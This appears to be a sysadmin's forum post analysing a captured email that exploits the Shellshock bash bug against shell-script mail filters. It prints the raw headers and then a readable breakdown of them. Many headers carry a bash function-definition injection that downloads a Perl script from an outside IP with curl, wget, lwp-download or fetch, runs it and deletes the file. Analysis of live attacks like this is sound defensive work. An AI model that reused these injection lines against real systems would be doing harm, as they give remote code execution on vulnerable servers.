A few days ago I found an email that was clearly attempting to exploit the recent bash vulnerability. Apparently the attack is aimed at mail filters, which may be shell scripts.
The original form of the message:
From - Fri Oct 24 20:38:48 2014
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <support@mata.com>
Delivered-To: my.user.name@my.domain.name.net
Received: by mail.my.domain.name.net (Postfix)
id 1B8E6306033C; Fri, 24 Oct 2014 20:38:44 +0400 (MSK)
Delivered-To: root@mail.my.domain.name.net
Received: by mail.my.domain.name.net (Postfix, from userid 1001)
id 055493060D8A; Fri, 24 Oct 2014 20:38:43 +0400 (MSK)
Received: from sub.domain.my.domain.name.net (unknown [11.22.33.44])
by mail.my.domain.name.net (Postfix) with ESMTP id D3496306033C
for <root@mail.my.domain.name.net>; Fri, 24 Oct 2014 20:38:43 +0400 (MSK)
Received: from USER (u16850951.onlinehome-server.com [74.208.184.251])
by sub.domain.my.domain.name.net (8.14.4/8.14.4/Debian-2ubuntu2) with SMTP id s9OGPr2d018507
for <root@localhost>; Fri, 24 Oct 2014 20:25:55 +0400
Resent-Message-Id: <201410241625.s9OGPr2d018507@sub.domain.my.domain.name.net>
To: () {:;;};cd/tmp;curl.-sO.178.254.31.165/ex.txt;lwp-download.http: //178.254.31.165/ex.txt@mail.my.domain.name.net;,
wget.178.254.31.165/ex.txt@mail.my.domain.name.net;,
fetch.178.254.31.165/ex.txt@mail.my.domain.name.net;,
perl.ex.txt@mail.my.domain.name.net;,
rm.-fr.ex.*@mail.my.domain.name.net;;;;;;;;
References:() { :; }; cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*;
Cc: () {:;;};cd/tmp;curl.-sO.178.254.31.165/ex.txt;lwp-download.http: //178.254.31.165/ex.txt@mail.my.domain.name.net;,
wget.178.254.31.165/ex.txt@mail.my.domain.name.net;,
fetch.178.254.31.165/ex.txt@mail.my.domain.name.net;,
perl.ex.txt@mail.my.domain.name.net;,
rm.-fr.ex.*@mail.my.domain.name.net;;;;;;;;
From: () {:;;};cd/tmp;curl.-sO.178.254.31.165/ex.txt;lwp-download.http: //178.254.31.165/ex.txt@mail.my.domain.name.net;,
wget.178.254.31.165/ex.txt@mail.my.domain.name.net;,
fetch.178.254.31.165/ex.txt@mail.my.domain.name.net;,
perl.ex.txt@mail.my.domain.name.net;,
rm.-fr.ex.*@mail.my.domain.name.net;;;;;;;;
Subject:() { :; }; cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*;
Date:() { :; }; cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*;
Message-ID:() { :; }; cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*;
Comments:() { :; }; cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*;
Keywords:() { :; }; cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*;
Resent-Date:() { :; }; cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*;
Resent-From: () {:;;};cd/tmp;curl.-sO.178.254.31.165/ex.txt;lwp-download.http: //178.254.31.165/ex.txt@mail.my.domain.name.net;,
wget.178.254.31.165/ex.txt@mail.my.domain.name.net;,
fetch.178.254.31.165/ex.txt@mail.my.domain.name.net;,
perl.ex.txt@mail.my.domain.name.net;,
rm.-fr.ex.*@mail.my.domain.name.net;;;;;;;;
In a more readable form:
Return-Path: <support@mata.com>
Delivered-To: my.user.name@my.domain.name.net
Received:
by mail.my.domain.name.net (Postfix)
id 1B8E6306033C;
Fri, 24 Oct 2014 20:38:44 +0400 (MSK)
Delivered-To: root@mail.my.domain.name.net
Received:
by mail.my.domain.name.net (Postfix, from userid 1001)
id 055493060D8A;
Fri, 24 Oct 2014 20:38:43 +0400 (MSK)
Received:
from sub.domain.my.domain.name.net (unknown [11.22.33.44])
by mail.my.domain.name.net (Postfix) with ESMTP
id D3496306033C
for <root@mail.my.domain.name.net>;
Fri, 24 Oct 2014 20:38:43 +0400 (MSK)
Received:
from USER (u16850951.onlinehome-server.com [74.208.184.251])
by sub.domain.my.domain.name.net (8.14.4/8.14.4/Debian-2ubuntu2) with SMTP
id s9OGPr2d018507
for <root@localhost>;
Fri, 24 Oct 2014 20:25:55 +0400
Resent-Message-Id: <201410241625.s9OGPr2d018507@sub.domain.my.domain.name.net>
Here we can see the uninformative support@mata.com and the not much more informative u16850951.onlinehome-server.com [74.208.184.251], from which the message was sent.
The headers:
To:
From:
Resent-From:
contain the following:
To: () {:;;};
cd/tmp;
curl.-sO.178.254.31.165/ex.txt;
lwp-download.http: //178.254.31.165/ex.txt@mail.my.domain.name.net;,
wget.178.254.31.165/ex.txt@mail.my.domain.name.net;,
fetch.178.254.31.165/ex.txt@mail.my.domain.name.net;,
perl.ex.txt@mail.my.domain.name.net;,
rm.-fr.ex.*@mail.my.domain.name.net;;;;;;;;
Here we can see 178.254.31.165/, on which the file ex.txt was, of course, already gone.
The headers:
References:
Subject:
Date:
Message-ID:
Comments:
Keywords:
Resent-Date:
contain the previous case, without the domain appended to the URL:
References:() { :; };
cd /tmp ;
curl -sO 178.254.31.165/ex.txt;
lwp-download http://178.254.31.165/ex.txt;
wget 178.254.31.165/ex.txt;
fetch 178.254.31.165/ex.txt;
perl ex.txt;
rm -fr ex.*;
Moved by beastie from admin